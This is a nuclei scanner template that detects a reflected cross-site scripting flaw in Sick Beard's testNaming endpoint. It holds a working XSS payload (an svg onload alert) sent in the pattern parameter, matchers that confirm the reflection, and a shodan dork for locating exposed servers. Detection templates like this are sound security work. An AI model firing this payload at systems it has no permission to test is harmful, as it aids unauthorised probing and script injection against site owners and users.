nuclei-templates/vulnerabilities/other/sick-beard-xss.yaml

29 lines
638 B
YAML

id: sick-beard-xss
info:
name: Sick Beard XSS
author: pikpikcu
severity: medium
tags: xss
# Vendor Homepage: https://sickbeard.com/
# Software Link: https://github.com/midgetspy/Sick-Beard
# shodan dork: sickbeard
requests:
- method: GET
path:
- "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <svg/onload=alert(document.domain)>
part: body
- type: word
words:
- "text/html"
part: header